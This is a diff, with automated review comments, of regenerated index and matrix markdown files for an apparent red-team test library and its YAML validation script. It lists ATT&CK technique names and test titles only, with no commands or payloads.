| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Create Account](./T1136/T1136.md) | [Launch Daemon](./T1160/T1160.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials in Files](./T1081/T1081.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| [Spearphishing Attachment](./T1193/T1193.md) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](./T1150/T1150.md) | [Disabling Security Tools](./T1089/T1089.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](./T1152/T1152.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Process Injection](./T1055/T1055.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](./T1056/T1056.md) | [Network Service Scanning](./T1046/T1046.md) | [Remote File Copy](./T1105/T1105.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Job Scheduling](./T1168/T1168.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](./T1166/T1166.md) | [File Deletion](./T1107/T1107.md) | [Input Prompt](./T1141/T1141.md) | [Network Share Discovery](./T1135/T1135.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+1 -1
@@ -3,7 +3,7 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Bash History](./T1139/T1139.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credential Dumping](./T1003/T1003.md) | [File and Directory Discovery](./T1083/T1083.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Files](./T1081/T1081.md) | [Network Service Scanning](./T1046/T1046.md) | [Logon Scripts](./T1037/T1037.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](./T1088/T1088.md) | [Clear Command History](./T1146/T1146.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Share Discovery](./T1135/T1135.md) | [Pass the Hash](./T1075/T1075.md) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+5 -5
@@ -43,7 +43,7 @@
- Atomic Test #10: Create ADS PowerShell [windows]
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -84,7 +84,7 @@
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- [T1014 Rootkit](./T1014/T1014.md)
- Atomic Test #4: Windows Signed Driver Rootkit Test [windows]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- [T1085 Rundll32](./T1085/T1085.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
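Review bot: the renumbering of Windows Signed Driver Rootkit Test from `Atomic Test #4` to `#3` is a side effect of deleting the LD_PRELOAD test in the YAML; because tests are numbered by position, any external notes or tickets that cite "T1014 Atomic Test #4" now point at the wrong test. Worth a line in the commit message so consumers of the index know the numbering shifted.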
@@ -127,7 +127,7 @@
- Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- [T1050 New Service](./T1050/T1050.md)
- Atomic Test #1: Service Installation [windows]
- Atomic Test #2: Service Installation PowerShell Installs A Local Service using PowerShell [windows]
@@ -188,7 +188,7 @@
- Atomic Test #1: Installing Hyper-V Feature [windows]
- [T1183 Image File Execution Options Injection](./T1183/T1183.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO GLobal Flags [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #1: Logon Scripts [windows]
@@ -443,7 +443,7 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
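Review bot: The new link to ./T1090/T1090.md is followed immediately by the T1094 entry with no "Atomic Test #N" sub-items, whereas every other linked technique visible in these hunks (T1085, T1183, T1050) lists its tests beneath the link. Either T1090 has tests that were not emitted into the index, or the technique file exists without tests and should arguably keep the CONTRIBUTE A TEST marker; confirm which case applies and fix accordingly.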
+1 -1
@@ -3,7 +3,7 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [CMSTP](./T1191/T1191.md) | [Accessibility Features](./T1015/T1015.md) | [Access Token Manipulation](./T1134/T1134.md) | [Access Token Manipulation](./T1134/T1134.md) | [Account Manipulation](./T1098/T1098.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](./T1015/T1015.md) | [BITS Jobs](./T1197/T1197.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Control Panel Items [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](./T1103/T1103.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Credential Dumping](./T1003/T1003.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](./T1173/T1173.md) | [Application Shimming](./T1138/T1138.md) | [AppInit DLLs](./T1103/T1103.md) | [Bypass User Account Control](./T1088/T1088.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Logon Scripts](./T1037/T1037.md) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| [Spearphishing Attachment](./T1193/T1193.md) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](./T1138/T1138.md) | [CMSTP](./T1191/T1191.md) | [Credentials in Registry](./T1214/T1214.md) | [Network Service Scanning](./T1046/T1046.md) | [Pass the Hash](./T1075/T1075.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](./T1197/T1197.md) | [Bypass User Account Control](./T1088/T1088.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](./T1135/T1135.md) | Pass the Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
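Review bot: The Connection Proxy cell now links to ./T1090/T1090.md, matching the index change, but both links depend on that file being part of this commit, which these hunks do not show; confirm T1090/T1090.md exists at exactly that path (the link is case-sensitive once served from a Linux host). The other ten cells of the row are unchanged, so the row still has eleven cells and remains aligned with the separator on line 3.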
+1 -1
@@ -9,7 +9,7 @@ ATOMIC_TEST_TEMPLATE = "#{File.dirname(File.dirname(__FILE__))}/atomic_red_team/
oks = []
fails = []
(ATOMIC_RED_TEAM.atomic_test_paths + [ATOMIC_TEST_TEMPLATE]).each do |path|
ATOMIC_RED_TEAM.atomic_test_paths.each do |path|
begin
print "Validating #{path}..."
YAML.load_file(path)
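Review bot: Removing ATOMIC_TEST_TEMPLATE from the validated paths means a YAML error in the test template is no longer caught by this script, and the constant defined at line 9 appears unused in the lines that follow. If the template is deliberately excluded because it is not meant to parse as YAML (placeholder text), say so in a comment and drop the now-unused constant; otherwise keep it in the list so contributors who copy the template start from a file that passes validation.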